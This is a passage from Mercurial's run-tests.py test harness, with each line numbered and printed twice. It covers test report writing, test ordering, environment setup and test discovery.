2793 # fail if string isn't ASCII.
2794 err = cdatasafe(err).decode('utf-8', 'replace')
2794 err = cdatasafe(err).decode('utf-8', 'replace')
2795 cd = doc.createCDATASection(err)
2795 cd = doc.createCDATASection(err)
2796 # Use 'failure' here instead of 'error' to match errors = 0,
2796 # Use 'failure' here instead of 'error' to match errors = 0,
2797 # failures = len(result.failures) in the testsuite element.
2797 # failures = len(result.failures) in the testsuite element.
2798 failelem = doc.createElement('failure')
2798 failelem = doc.createElement('failure')
2799 failelem.setAttribute('message', 'output changed')
2799 failelem.setAttribute('message', 'output changed')
2800 failelem.setAttribute('type', 'output-mismatch')
2800 failelem.setAttribute('type', 'output-mismatch')
2801 failelem.appendChild(cd)
2801 failelem.appendChild(cd)
2802 t.appendChild(failelem)
2802 t.appendChild(failelem)
2803 s.appendChild(t)
2803 s.appendChild(t)
2804 for tc, message in result.skipped:
2804 for tc, message in result.skipped:
2805 # According to the schema, 'skipped' has no attributes. So store
2805 # According to the schema, 'skipped' has no attributes. So store
2806 # the skip message as a text node instead.
2806 # the skip message as a text node instead.
2807 t = doc.createElement('testcase')
2807 t = doc.createElement('testcase')
2808 t.setAttribute('name', tc.name)
2808 t.setAttribute('name', tc.name)
2809 binmessage = message.encode('utf-8')
2809 binmessage = message.encode('utf-8')
2810 message = cdatasafe(binmessage).decode('utf-8', 'replace')
2810 message = cdatasafe(binmessage).decode('utf-8', 'replace')
2811 cd = doc.createCDATASection(message)
2811 cd = doc.createCDATASection(message)
2812 skipelem = doc.createElement('skipped')
2812 skipelem = doc.createElement('skipped')
2813 skipelem.appendChild(cd)
2813 skipelem.appendChild(cd)
2814 t.appendChild(skipelem)
2814 t.appendChild(skipelem)
2815 s.appendChild(t)
2815 s.appendChild(t)
2816 outf.write(doc.toprettyxml(indent=' ', encoding='utf-8'))
2816 outf.write(doc.toprettyxml(indent=' ', encoding='utf-8'))
2817
2817
2818 @staticmethod
2818 @staticmethod
2819 def _writejson(result, outf):
2819 def _writejson(result, outf):
2820 timesd = {}
2820 timesd = {}
2821 for tdata in result.times:
2821 for tdata in result.times:
2822 test = tdata[0]
2822 test = tdata[0]
2823 timesd[test] = tdata[1:]
2823 timesd[test] = tdata[1:]
2824
2824
2825 outcome = {}
2825 outcome = {}
2826 groups = [
2826 groups = [
2827 ('success', ((tc, None) for tc in result.successes)),
2827 ('success', ((tc, None) for tc in result.successes)),
2828 ('failure', result.failures),
2828 ('failure', result.failures),
2829 ('skip', result.skipped),
2829 ('skip', result.skipped),
2830 ]
2830 ]
2831 for res, testcases in groups:
2831 for res, testcases in groups:
2832 for tc, __ in testcases:
2832 for tc, __ in testcases:
2833 if tc.name in timesd:
2833 if tc.name in timesd:
2834 diff = result.faildata.get(tc.name, b'')
2834 diff = result.faildata.get(tc.name, b'')
2835 try:
2835 try:
2836 diff = diff.decode('unicode_escape')
2836 diff = diff.decode('unicode_escape')
2837 except UnicodeDecodeError as e:
2837 except UnicodeDecodeError as e:
2838 diff = '%r decoding diff, sorry' % e
2838 diff = '%r decoding diff, sorry' % e
2839 tres = {
2839 tres = {
2840 'result': res,
2840 'result': res,
2841 'time': ('%0.3f' % timesd[tc.name][2]),
2841 'time': ('%0.3f' % timesd[tc.name][2]),
2842 'cuser': ('%0.3f' % timesd[tc.name][0]),
2842 'cuser': ('%0.3f' % timesd[tc.name][0]),
2843 'csys': ('%0.3f' % timesd[tc.name][1]),
2843 'csys': ('%0.3f' % timesd[tc.name][1]),
2844 'start': ('%0.3f' % timesd[tc.name][3]),
2844 'start': ('%0.3f' % timesd[tc.name][3]),
2845 'end': ('%0.3f' % timesd[tc.name][4]),
2845 'end': ('%0.3f' % timesd[tc.name][4]),
2846 'diff': diff,
2846 'diff': diff,
2847 }
2847 }
2848 else:
2848 else:
2849 # blacklisted test
2849 # blacklisted test
2850 tres = {'result': res}
2850 tres = {'result': res}
2851
2851
2852 outcome[tc.name] = tres
2852 outcome[tc.name] = tres
2853 jsonout = json.dumps(
2853 jsonout = json.dumps(
2854 outcome, sort_keys=True, indent=4, separators=(',', ': ')
2854 outcome, sort_keys=True, indent=4, separators=(',', ': ')
2855 )
2855 )
2856 outf.writelines(("testreport =", jsonout))
2856 outf.writelines(("testreport =", jsonout))
2857
2857
2858
2858
2859 def sorttests(testdescs, previoustimes, shuffle=False):
2859 def sorttests(testdescs, previoustimes, shuffle=False):
2860 """Do an in-place sort of tests."""
2860 """Do an in-place sort of tests."""
2861 if shuffle:
2861 if shuffle:
2862 random.shuffle(testdescs)
2862 random.shuffle(testdescs)
2863 return
2863 return
2864
2864
2865 if previoustimes:
2865 if previoustimes:
2866
2866
2867 def sortkey(f):
2867 def sortkey(f):
2868 f = f['path']
2868 f = f['path']
2869 if f in previoustimes:
2869 if f in previoustimes:
2870 # Use most recent time as estimate
2870 # Use most recent time as estimate
2871 return -(previoustimes[f][-1])
2871 return -(previoustimes[f][-1])
2872 else:
2872 else:
2873 # Default to a rather arbitrary value of 1 second for new tests
2873 # Default to a rather arbitrary value of 1 second for new tests
2874 return -1.0
2874 return -1.0
2875
2875
2876 else:
2876 else:
2877 # keywords for slow tests
2877 # keywords for slow tests
2878 slow = {
2878 slow = {
2879 b'svn': 10,
2879 b'svn': 10,
2880 b'cvs': 10,
2880 b'cvs': 10,
2881 b'hghave': 10,
2881 b'hghave': 10,
2882 b'largefiles-update': 10,
2882 b'largefiles-update': 10,
2883 b'run-tests': 10,
2883 b'run-tests': 10,
2884 b'corruption': 10,
2884 b'corruption': 10,
2885 b'race': 10,
2885 b'race': 10,
2886 b'i18n': 10,
2886 b'i18n': 10,
2887 b'check': 100,
2887 b'check': 100,
2888 b'gendoc': 100,
2888 b'gendoc': 100,
2889 b'contrib-perf': 200,
2889 b'contrib-perf': 200,
2890 b'merge-combination': 100,
2890 b'merge-combination': 100,
2891 }
2891 }
2892 perf = {}
2892 perf = {}
2893
2893
2894 def sortkey(f):
2894 def sortkey(f):
2895 # run largest tests first, as they tend to take the longest
2895 # run largest tests first, as they tend to take the longest
2896 f = f['path']
2896 f = f['path']
2897 try:
2897 try:
2898 return perf[f]
2898 return perf[f]
2899 except KeyError:
2899 except KeyError:
2900 try:
2900 try:
2901 val = -os.stat(f).st_size
2901 val = -os.stat(f).st_size
2902 except OSError as e:
2902 except OSError as e:
2903 if e.errno != errno.ENOENT:
2903 if e.errno != errno.ENOENT:
2904 raise
2904 raise
2905 perf[f] = -1e9 # file does not exist, tell early
2905 perf[f] = -1e9 # file does not exist, tell early
2906 return -1e9
2906 return -1e9
2907 for kw, mul in slow.items():
2907 for kw, mul in slow.items():
2908 if kw in f:
2908 if kw in f:
2909 val *= mul
2909 val *= mul
2910 if f.endswith(b'.py'):
2910 if f.endswith(b'.py'):
2911 val /= 10.0
2911 val /= 10.0
2912 perf[f] = val / 1000.0
2912 perf[f] = val / 1000.0
2913 return perf[f]
2913 return perf[f]
2914
2914
2915 testdescs.sort(key=sortkey)
2915 testdescs.sort(key=sortkey)
2916
2916
2917
2917
2918 class TestRunner(object):
2918 class TestRunner(object):
2919 """Holds context for executing tests.
2919 """Holds context for executing tests.
2920
2920
2921 Tests rely on a lot of state. This object holds it for them.
2921 Tests rely on a lot of state. This object holds it for them.
2922 """
2922 """
2923
2923
2924 # Programs required to run tests.
2924 # Programs required to run tests.
2925 REQUIREDTOOLS = [
2925 REQUIREDTOOLS = [
2926 b'diff',
2926 b'diff',
2927 b'grep',
2927 b'grep',
2928 b'unzip',
2928 b'unzip',
2929 b'gunzip',
2929 b'gunzip',
2930 b'bunzip2',
2930 b'bunzip2',
2931 b'sed',
2931 b'sed',
2932 ]
2932 ]
2933
2933
2934 # Maps file extensions to test class.
2934 # Maps file extensions to test class.
2935 TESTTYPES = [
2935 TESTTYPES = [
2936 (b'.py', PythonTest),
2936 (b'.py', PythonTest),
2937 (b'.t', TTest),
2937 (b'.t', TTest),
2938 ]
2938 ]
2939
2939
2940 def __init__(self):
2940 def __init__(self):
2941 self.options = None
2941 self.options = None
2942 self._hgroot = None
2942 self._hgroot = None
2943 self._testdir = None
2943 self._testdir = None
2944 self._outputdir = None
2944 self._outputdir = None
2945 self._hgtmp = None
2945 self._hgtmp = None
2946 self._installdir = None
2946 self._installdir = None
2947 self._bindir = None
2947 self._bindir = None
2948 self._tmpbinddir = None
2948 self._tmpbinddir = None
2949 self._pythondir = None
2949 self._pythondir = None
2950 self._coveragefile = None
2950 self._coveragefile = None
2951 self._createdfiles = []
2951 self._createdfiles = []
2952 self._hgcommand = None
2952 self._hgcommand = None
2953 self._hgpath = None
2953 self._hgpath = None
2954 self._portoffset = 0
2954 self._portoffset = 0
2955 self._ports = {}
2955 self._ports = {}
2956
2956
2957 def run(self, args, parser=None):
2957 def run(self, args, parser=None):
2958 """Run the test suite."""
2958 """Run the test suite."""
2959 oldmask = os.umask(0o22)
2959 oldmask = os.umask(0o22)
2960 try:
2960 try:
2961 parser = parser or getparser()
2961 parser = parser or getparser()
2962 options = parseargs(args, parser)
2962 options = parseargs(args, parser)
2963 tests = [_sys2bytes(a) for a in options.tests]
2963 tests = [_sys2bytes(a) for a in options.tests]
2964 if options.test_list is not None:
2964 if options.test_list is not None:
2965 for listfile in options.test_list:
2965 for listfile in options.test_list:
2966 with open(listfile, 'rb') as f:
2966 with open(listfile, 'rb') as f:
2967 tests.extend(t for t in f.read().splitlines() if t)
2967 tests.extend(t for t in f.read().splitlines() if t)
2968 self.options = options
2968 self.options = options
2969
2969
2970 self._checktools()
2970 self._checktools()
2971 testdescs = self.findtests(tests)
2971 testdescs = self.findtests(tests)
2972 if options.profile_runner:
2972 if options.profile_runner:
2973 import statprof
2973 import statprof
2974
2974
2975 statprof.start()
2975 statprof.start()
2976 result = self._run(testdescs)
2976 result = self._run(testdescs)
2977 if options.profile_runner:
2977 if options.profile_runner:
2978 statprof.stop()
2978 statprof.stop()
2979 statprof.display()
2979 statprof.display()
2980 return result
2980 return result
2981
2981
2982 finally:
2982 finally:
2983 os.umask(oldmask)
2983 os.umask(oldmask)
2984
2984
2985 def _run(self, testdescs):
2985 def _run(self, testdescs):
2986 testdir = getcwdb()
2986 testdir = getcwdb()
2987 self._testdir = osenvironb[b'TESTDIR'] = getcwdb()
2987 self._testdir = osenvironb[b'TESTDIR'] = getcwdb()
2988 # assume all tests in same folder for now
2988 # assume all tests in same folder for now
2989 if testdescs:
2989 if testdescs:
2990 pathname = os.path.dirname(testdescs[0]['path'])
2990 pathname = os.path.dirname(testdescs[0]['path'])
2991 if pathname:
2991 if pathname:
2992 testdir = os.path.join(testdir, pathname)
2992 testdir = os.path.join(testdir, pathname)
2993 self._testdir = osenvironb[b'TESTDIR'] = testdir
2993 self._testdir = osenvironb[b'TESTDIR'] = testdir
2994 if self.options.outputdir:
2994 if self.options.outputdir:
2995 self._outputdir = canonpath(_sys2bytes(self.options.outputdir))
2995 self._outputdir = canonpath(_sys2bytes(self.options.outputdir))
2996 else:
2996 else:
2997 self._outputdir = getcwdb()
2997 self._outputdir = getcwdb()
2998 if testdescs and pathname:
2998 if testdescs and pathname:
2999 self._outputdir = os.path.join(self._outputdir, pathname)
2999 self._outputdir = os.path.join(self._outputdir, pathname)
3000 previoustimes = {}
3000 previoustimes = {}
3001 if self.options.order_by_runtime:
3001 if self.options.order_by_runtime:
3002 previoustimes = dict(loadtimes(self._outputdir))
3002 previoustimes = dict(loadtimes(self._outputdir))
3003 sorttests(testdescs, previoustimes, shuffle=self.options.random)
3003 sorttests(testdescs, previoustimes, shuffle=self.options.random)
3004
3004
3005 if 'PYTHONHASHSEED' not in os.environ:
3005 if 'PYTHONHASHSEED' not in os.environ:
3006 # use a random python hash seed all the time
3006 # use a random python hash seed all the time
3007 # we do the randomness ourself to know what seed is used
3007 # we do the randomness ourself to know what seed is used
3008 os.environ['PYTHONHASHSEED'] = str(random.getrandbits(32))
3008 os.environ['PYTHONHASHSEED'] = str(random.getrandbits(32))
3009
3009
3010 # Rayon (Rust crate for multi-threading) will use all logical CPU cores
3010 # Rayon (Rust crate for multi-threading) will use all logical CPU cores
3011 # by default, causing thrashing on high-cpu-count systems.
3011 # by default, causing thrashing on high-cpu-count systems.
3012 # Setting its limit to 3 during tests should still let us uncover
3012 # Setting its limit to 3 during tests should still let us uncover
3013 # multi-threading bugs while keeping the thrashing reasonable.
3013 # multi-threading bugs while keeping the thrashing reasonable.
3014 os.environ.setdefault("RAYON_NUM_THREADS", "3")
3014 os.environ.setdefault("RAYON_NUM_THREADS", "3")
3015
3015
3016 if self.options.tmpdir:
3016 if self.options.tmpdir:
3017 self.options.keep_tmpdir = True
3017 self.options.keep_tmpdir = True
3018 tmpdir = _sys2bytes(self.options.tmpdir)
3018 tmpdir = _sys2bytes(self.options.tmpdir)
3019 if os.path.exists(tmpdir):
3019 if os.path.exists(tmpdir):
3020 # Meaning of tmpdir has changed since 1.3: we used to create
3020 # Meaning of tmpdir has changed since 1.3: we used to create
3021 # HGTMP inside tmpdir; now HGTMP is tmpdir. So fail if
3021 # HGTMP inside tmpdir; now HGTMP is tmpdir. So fail if
3022 # tmpdir already exists.
3022 # tmpdir already exists.
3023 print("error: temp dir %r already exists" % tmpdir)
3023 print("error: temp dir %r already exists" % tmpdir)
3024 return 1
3024 return 1
3025
3025
3026 os.makedirs(tmpdir)
3026 os.makedirs(tmpdir)
3027 else:
3027 else:
3028 d = None
3028 d = None
3029 if os.name == 'nt':
3029 if os.name == 'nt':
3030 # without this, we get the default temp dir location, but
3030 # without this, we get the default temp dir location, but
3031 # in all lowercase, which causes troubles with paths (issue3490)
3031 # in all lowercase, which causes troubles with paths (issue3490)
3032 d = osenvironb.get(b'TMP', None)
3032 d = osenvironb.get(b'TMP', None)
3033 tmpdir = tempfile.mkdtemp(b'', b'hgtests.', d)
3033 tmpdir = tempfile.mkdtemp(b'', b'hgtests.', d)
3034
3034
3035 self._hgtmp = osenvironb[b'HGTMP'] = os.path.realpath(tmpdir)
3035 self._hgtmp = osenvironb[b'HGTMP'] = os.path.realpath(tmpdir)
3036
3036
3037 if self.options.with_hg:
3037 if self.options.with_hg:
3038 self._installdir = None
3038 self._installdir = None
3039 whg = self.options.with_hg
3039 whg = self.options.with_hg
3040 self._bindir = os.path.dirname(os.path.realpath(whg))
3040 self._bindir = os.path.dirname(os.path.realpath(whg))
3041 assert isinstance(self._bindir, bytes)
3041 assert isinstance(self._bindir, bytes)
3042 self._hgcommand = os.path.basename(whg)
3042 self._hgcommand = os.path.basename(whg)
3043 self._tmpbindir = os.path.join(self._hgtmp, b'install', b'bin')
3043 self._tmpbindir = os.path.join(self._hgtmp, b'install', b'bin')
3044 os.makedirs(self._tmpbindir)
3044 os.makedirs(self._tmpbindir)
3045
3045
3046 normbin = os.path.normpath(os.path.abspath(whg))
3046 normbin = os.path.normpath(os.path.abspath(whg))
3047 normbin = normbin.replace(_sys2bytes(os.sep), b'/')
3047 normbin = normbin.replace(_sys2bytes(os.sep), b'/')
3048
3048
3049 # Other Python scripts in the test harness need to
3049 # Other Python scripts in the test harness need to
3050 # `import mercurial`. If `hg` is a Python script, we assume
3050 # `import mercurial`. If `hg` is a Python script, we assume
3051 # the Mercurial modules are relative to its path and tell the tests
3051 # the Mercurial modules are relative to its path and tell the tests
3052 # to load Python modules from its directory.
3052 # to load Python modules from its directory.
3053 with open(whg, 'rb') as fh:
3053 with open(whg, 'rb') as fh:
3054 initial = fh.read(1024)
3054 initial = fh.read(1024)
3055
3055
3056 if re.match(b'#!.*python', initial):
3056 if re.match(b'#!.*python', initial):
3057 self._pythondir = self._bindir
3057 self._pythondir = self._bindir
3058 # If it looks like our in-repo Rust binary, use the source root.
3058 # If it looks like our in-repo Rust binary, use the source root.
3059 # This is a bit hacky. But rhg is still not supported outside the
3059 # This is a bit hacky. But rhg is still not supported outside the
3060 # source directory. So until it is, do the simple thing.
3060 # source directory. So until it is, do the simple thing.
3061 elif re.search(b'/rust/target/[^/]+/hg', normbin):
3061 elif re.search(b'/rust/target/[^/]+/hg', normbin):
3062 self._pythondir = os.path.dirname(self._testdir)
3062 self._pythondir = os.path.dirname(self._testdir)
3063 # Fall back to the legacy behavior.
3063 # Fall back to the legacy behavior.
3064 else:
3064 else:
3065 self._pythondir = self._bindir
3065 self._pythondir = self._bindir
3066
3066
3067 else:
3067 else:
3068 self._installdir = os.path.join(self._hgtmp, b"install")
3068 self._installdir = os.path.join(self._hgtmp, b"install")
3069 self._bindir = os.path.join(self._installdir, b"bin")
3069 self._bindir = os.path.join(self._installdir, b"bin")
3070 self._hgcommand = b'hg'
3070 self._hgcommand = b'hg'
3071 self._tmpbindir = self._bindir
3071 self._tmpbindir = self._bindir
3072 self._pythondir = os.path.join(self._installdir, b"lib", b"python")
3072 self._pythondir = os.path.join(self._installdir, b"lib", b"python")
3073
3073
3074 # Force the use of hg.exe instead of relying on MSYS to recognize hg is
3074 # Force the use of hg.exe instead of relying on MSYS to recognize hg is
3075 # a python script and feed it to python.exe. Legacy stdio is force
3075 # a python script and feed it to python.exe. Legacy stdio is force
3076 # enabled by hg.exe, and this is a more realistic way to launch hg
3076 # enabled by hg.exe, and this is a more realistic way to launch hg
3077 # anyway.
3077 # anyway.
3078 if os.name == 'nt' and not self._hgcommand.endswith(b'.exe'):
3078 if os.name == 'nt' and not self._hgcommand.endswith(b'.exe'):
3079 self._hgcommand += b'.exe'
3079 self._hgcommand += b'.exe'
3080
3080
3081 # set CHGHG, then replace "hg" command by "chg"
3081 # set CHGHG, then replace "hg" command by "chg"
3082 chgbindir = self._bindir
3082 chgbindir = self._bindir
3083 if self.options.chg or self.options.with_chg:
3083 if self.options.chg or self.options.with_chg:
3084 osenvironb[b'CHGHG'] = os.path.join(self._bindir, self._hgcommand)
3084 osenvironb[b'CHGHG'] = os.path.join(self._bindir, self._hgcommand)
3085 else:
3085 else:
3086 osenvironb.pop(b'CHGHG', None) # drop flag for hghave
3086 osenvironb.pop(b'CHGHG', None) # drop flag for hghave
3087 if self.options.chg:
3087 if self.options.chg:
3088 self._hgcommand = b'chg'
3088 self._hgcommand = b'chg'
3089 elif self.options.with_chg:
3089 elif self.options.with_chg:
3090 chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
3090 chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg))
3091 self._hgcommand = os.path.basename(self.options.with_chg)
3091 self._hgcommand = os.path.basename(self.options.with_chg)
3092
3092
3093 osenvironb[b"BINDIR"] = self._bindir
3093 osenvironb[b"BINDIR"] = self._bindir
3094 osenvironb[b"PYTHON"] = PYTHON
3094 osenvironb[b"PYTHON"] = PYTHON
3095
3095
3096 fileb = _sys2bytes(__file__)
3096 fileb = _sys2bytes(__file__)
3097 runtestdir = os.path.abspath(os.path.dirname(fileb))
3097 runtestdir = os.path.abspath(os.path.dirname(fileb))
3098 osenvironb[b'RUNTESTDIR'] = runtestdir
3098 osenvironb[b'RUNTESTDIR'] = runtestdir
3099 if PYTHON3:
3099 if PYTHON3:
3100 sepb = _sys2bytes(os.pathsep)
3100 sepb = _sys2bytes(os.pathsep)
3101 else:
3101 else:
3102 sepb = os.pathsep
3102 sepb = os.pathsep
3103 path = [self._bindir, runtestdir] + osenvironb[b"PATH"].split(sepb)
3103 path = [self._bindir, runtestdir] + osenvironb[b"PATH"].split(sepb)
3104 if os.path.islink(__file__):
3104 if os.path.islink(__file__):
3105 # test helper will likely be at the end of the symlink
3105 # test helper will likely be at the end of the symlink
3106 realfile = os.path.realpath(fileb)
3106 realfile = os.path.realpath(fileb)
3107 realdir = os.path.abspath(os.path.dirname(realfile))
3107 realdir = os.path.abspath(os.path.dirname(realfile))
3108 path.insert(2, realdir)
3108 path.insert(2, realdir)
3109 if chgbindir != self._bindir:
3109 if chgbindir != self._bindir:
3110 path.insert(1, chgbindir)
3110 path.insert(1, chgbindir)
3111 if self._testdir != runtestdir:
3111 if self._testdir != runtestdir:
3112 path = [self._testdir] + path
3112 path = [self._testdir] + path
3113 if self._tmpbindir != self._bindir:
3113 if self._tmpbindir != self._bindir:
3114 path = [self._tmpbindir] + path
3114 path = [self._tmpbindir] + path
3115 osenvironb[b"PATH"] = sepb.join(path)
3115 osenvironb[b"PATH"] = sepb.join(path)
3116
3116
3117 # Include TESTDIR in PYTHONPATH so that out-of-tree extensions
3117 # Include TESTDIR in PYTHONPATH so that out-of-tree extensions
3118 # can run .../tests/run-tests.py test-foo where test-foo
3118 # can run .../tests/run-tests.py test-foo where test-foo
3119 # adds an extension to HGRC. Also include run-test.py directory to
3119 # adds an extension to HGRC. Also include run-test.py directory to
3120 # import modules like heredoctest.
3120 # import modules like heredoctest.
3121 pypath = [self._pythondir, self._testdir, runtestdir]
3121 pypath = [self._pythondir, self._testdir, runtestdir]
3122 # We have to augment PYTHONPATH, rather than simply replacing
3122 # We have to augment PYTHONPATH, rather than simply replacing
3123 # it, in case external libraries are only available via current
3123 # it, in case external libraries are only available via current
3124 # PYTHONPATH. (In particular, the Subversion bindings on OS X
3124 # PYTHONPATH. (In particular, the Subversion bindings on OS X
3125 # are in /opt/subversion.)
3125 # are in /opt/subversion.)
3126 oldpypath = osenvironb.get(IMPL_PATH)
3126 oldpypath = osenvironb.get(IMPL_PATH)
3127 if oldpypath:
3127 if oldpypath:
3128 pypath.append(oldpypath)
3128 pypath.append(oldpypath)
3129 osenvironb[IMPL_PATH] = sepb.join(pypath)
3129 osenvironb[IMPL_PATH] = sepb.join(pypath)
3130
3130
3131 if self.options.pure:
3131 if self.options.pure:
3132 os.environ["HGTEST_RUN_TESTS_PURE"] = "--pure"
3132 os.environ["HGTEST_RUN_TESTS_PURE"] = "--pure"
3133 os.environ["HGMODULEPOLICY"] = "py"
3133 os.environ["HGMODULEPOLICY"] = "py"
3134 if self.options.rust:
3134 if self.options.rust:
3135 os.environ["HGMODULEPOLICY"] = "rust+c"
3135 os.environ["HGMODULEPOLICY"] = "rust+c"
3136 if self.options.no_rust:
3136 if self.options.no_rust:
3137 current_policy = os.environ.get("HGMODULEPOLICY", "")
3137 current_policy = os.environ.get("HGMODULEPOLICY", "")
3138 if current_policy.startswith("rust+"):
3138 if current_policy.startswith("rust+"):
3139 os.environ["HGMODULEPOLICY"] = current_policy[len("rust+") :]
3139 os.environ["HGMODULEPOLICY"] = current_policy[len("rust+") :]
3140 os.environ.pop("HGWITHRUSTEXT", None)
3140 os.environ.pop("HGWITHRUSTEXT", None)
3141
3141
3142 if self.options.allow_slow_tests:
3142 if self.options.allow_slow_tests:
3143 os.environ["HGTEST_SLOW"] = "slow"
3143 os.environ["HGTEST_SLOW"] = "slow"
3144 elif 'HGTEST_SLOW' in os.environ:
3144 elif 'HGTEST_SLOW' in os.environ:
3145 del os.environ['HGTEST_SLOW']
3145 del os.environ['HGTEST_SLOW']
3146
3146
3147 self._coveragefile = os.path.join(self._testdir, b'.coverage')
3147 self._coveragefile = os.path.join(self._testdir, b'.coverage')
3148
3148
3149 if self.options.exceptions:
3149 if self.options.exceptions:
3150 exceptionsdir = os.path.join(self._outputdir, b'exceptions')
3150 exceptionsdir = os.path.join(self._outputdir, b'exceptions')
3151 try:
3151 try:
3152 os.makedirs(exceptionsdir)
3152 os.makedirs(exceptionsdir)
3153 except OSError as e:
3153 except OSError as e:
3154 if e.errno != errno.EEXIST:
3154 if e.errno != errno.EEXIST:
3155 raise
3155 raise
3156
3156
3157 # Remove all existing exception reports.
3157 # Remove all existing exception reports.
3158 for f in os.listdir(exceptionsdir):
3158 for f in os.listdir(exceptionsdir):
3159 os.unlink(os.path.join(exceptionsdir, f))
3159 os.unlink(os.path.join(exceptionsdir, f))
3160
3160
3161 osenvironb[b'HGEXCEPTIONSDIR'] = exceptionsdir
3161 osenvironb[b'HGEXCEPTIONSDIR'] = exceptionsdir
3162 logexceptions = os.path.join(self._testdir, b'logexceptions.py')
3162 logexceptions = os.path.join(self._testdir, b'logexceptions.py')
3163 self.options.extra_config_opt.append(
3163 self.options.extra_config_opt.append(
3164 'extensions.logexceptions=%s' % logexceptions.decode('utf-8')
3164 'extensions.logexceptions=%s' % logexceptions.decode('utf-8')
3165 )
3165 )
3166
3166
3167 vlog("# Using TESTDIR", _bytes2sys(self._testdir))
3167 vlog("# Using TESTDIR", _bytes2sys(self._testdir))
3168 vlog("# Using RUNTESTDIR", _bytes2sys(osenvironb[b'RUNTESTDIR']))
3168 vlog("# Using RUNTESTDIR", _bytes2sys(osenvironb[b'RUNTESTDIR']))
3169 vlog("# Using HGTMP", _bytes2sys(self._hgtmp))
3169 vlog("# Using HGTMP", _bytes2sys(self._hgtmp))
3170 vlog("# Using PATH", os.environ["PATH"])
3170 vlog("# Using PATH", os.environ["PATH"])
3171 vlog(
3171 vlog(
3172 "# Using", _bytes2sys(IMPL_PATH), _bytes2sys(osenvironb[IMPL_PATH]),
3172 "# Using", _bytes2sys(IMPL_PATH), _bytes2sys(osenvironb[IMPL_PATH]),
3173 )
3173 )
3174 vlog("# Writing to directory", _bytes2sys(self._outputdir))
3174 vlog("# Writing to directory", _bytes2sys(self._outputdir))
3175
3175
3176 try:
3176 try:
3177 return self._runtests(testdescs) or 0
3177 return self._runtests(testdescs) or 0
3178 finally:
3178 finally:
3179 time.sleep(0.1)
3179 time.sleep(0.1)
3180 self._cleanup()
3180 self._cleanup()
3181
3181
3182 def findtests(self, args):
3182 def findtests(self, args):
3183 """Finds possible test files from arguments.
3183 """Finds possible test files from arguments.
3184
3184
3185 If you wish to inject custom tests into the test harness, this would
3185 If you wish to inject custom tests into the test harness, this would
3186 be a good function to monkeypatch or override in a derived class.
3186 be a good function to monkeypatch or override in a derived class.
3187 """
3187 """
3188 if not args:
3188 if not args:
3189 if self.options.changed:
3189 if self.options.changed:
3190 proc = Popen4(
3190 proc = Popen4(
3191 b'hg st --rev "%s" -man0 .'
3191 b'hg st --rev "%s" -man0 .'
3192 % _sys2bytes(self.options.changed),
3192 % _sys2bytes(self.options.changed),
3193 None,
3193 None,
3194 0,
3194 0,
3195 )
3195 )
3196 stdout, stderr = proc.communicate()
3196 stdout, stderr = proc.communicate()
3197 args = stdout.strip(b'\0').split(b'\0')
3197 args = stdout.strip(b'\0').split(b'\0')
3198 else:
3198 else:
3199 args = os.listdir(b'.')
3199 args = os.listdir(b'.')
3200
3200
3201 expanded_args = []
3201 expanded_args = []
3202 for arg in args:
3202 for arg in args:
3203 if os.path.isdir(arg):
3203 if os.path.isdir(arg):
3204 if not arg.endswith(b'/'):
3204 if not arg.endswith(b'/'):
3205 arg += b'/'
3205 arg += b'/'
3206 expanded_args.extend([arg + a for a in os.listdir(arg)])
3206 expanded_args.extend([arg + a for a in os.listdir(arg)])
3207 else:
3207 else:
3208 expanded_args.append(arg)
3208 expanded_args.append(arg)
3209 args = expanded_args
3209 args = expanded_args
3210
3210
3211 testcasepattern = re.compile(br'([\w-]+\.t|py)(?:#([a-zA-Z0-9_\-.#]+))')
3211 testcasepattern = re.compile(br'([\w-]+\.t|py)(?:#([a-zA-Z0-9_\-.#]+))')
3212 tests = []
3212 tests = []
3213 for t in args:
3213 for t in args:
3214 case = []
3214 case = []
3215
3215
3216 if not (
3216 if not (
3217 os.path.basename(t).startswith(b'test-')
3217 os.path.basename(t).startswith(b'test-')
3218 and (t.endswith(b'.py') or t.endswith(b'.t'))
3218 and (t.endswith(b'.py') or t.endswith(b'.t'))
3219 ):
3219 ):
3220
3220
3221 m = testcasepattern.match(os.path.basename(t))
3221 m = testcasepattern.match(os.path.basename(t))
3222 if m is not None:
3222 if m is not None:
3223 t_basename, casestr = m.groups()
3223 t_basename, casestr = m.groups()
3224 t = os.path.join(os.path.dirname(t), t_basename)
3224 t = os.path.join(os.path.dirname(t), t_basename)
3225 if casestr:
3225 if casestr:
3226 case = casestr.split(b'#')
3226 case = casestr.split(b'#')
3227 else:
3227 else:
3228 continue
3228 continue
3229
3229
3230 if t.endswith(b'.t'):
3230 if t.endswith(b'.t'):
3231 # .t file may contain multiple test cases
3231 # .t file may contain multiple test cases
3232 casedimensions = parsettestcases(t)
3232 casedimensions = parsettestcases(t)
3233 if casedimensions:
3233 if casedimensions:
3234 cases = []
3234 cases = []
3235
3235
3236 def addcases(case, casedimensions):
3236 def addcases(case, casedimensions):
3237 if not casedimensions:
3237 if not casedimensions:
3238 cases.append(case)
3238 cases.append(case)
3239 else:
3239 else:
3240 for c in casedimensions[0]:
3240 for c in casedimensions[0]:
3241 addcases(case + [c], casedimensions[1:])
3241 addcases(case + [c], casedimensions[1:])
3242
3242
3243 addcases([], casedimensions)
3243 addcases([], casedimensions)
3244 if case and case in cases:
3244 if case and case in cases:
3245 cases = [case]
3245 cases = [case]
3246 elif case:
3246 elif case:
3247 # Ignore invalid cases
3247 # Ignore invalid cases
3248 cases = []
3248 cases = []
3249 else:
3249 else:
3250 pass
3250 pass
3251 tests += [{'path': t, 'case': c} for c in sorted(cases)]
3251 tests += [{'path': t, 'case': c} for c in sorted(cases)]
3252 else:
3252 else:
3253 tests.append({'path': t})
3253 tests.append({'path': t})
3254 else:
3254 else:
3255 tests.append({'path': t})
3255 tests.append({'path': t})
3256 return tests
3256 return tests
3257
3257
3258 def _runtests(self, testdescs):
3258 def _runtests(self, testdescs):
3259 def _reloadtest(test, i):
3259 def _reloadtest(test, i):
3260 # convert a test back to its description dict
3260 # convert a test back to its description dict
3261 desc = {'path': test.path}
3261 desc = {'path': test.path}
3262 case = getattr(test, '_case', [])
3262 case = getattr(test, '_case', [])
3263 if case:
3263 if case:
3264 desc['case'] = case
3264 desc['case'] = case
3265 return self._gettest(desc, i)
3265 return self._gettest(desc, i)
3266
3266
3267 try:
3267 try:
3268 if self.options.restart:
3268 if self.options.restart:
3269 orig = list(testdescs)
3269 orig = list(testdescs)
3270 while testdescs:
3270 while testdescs:
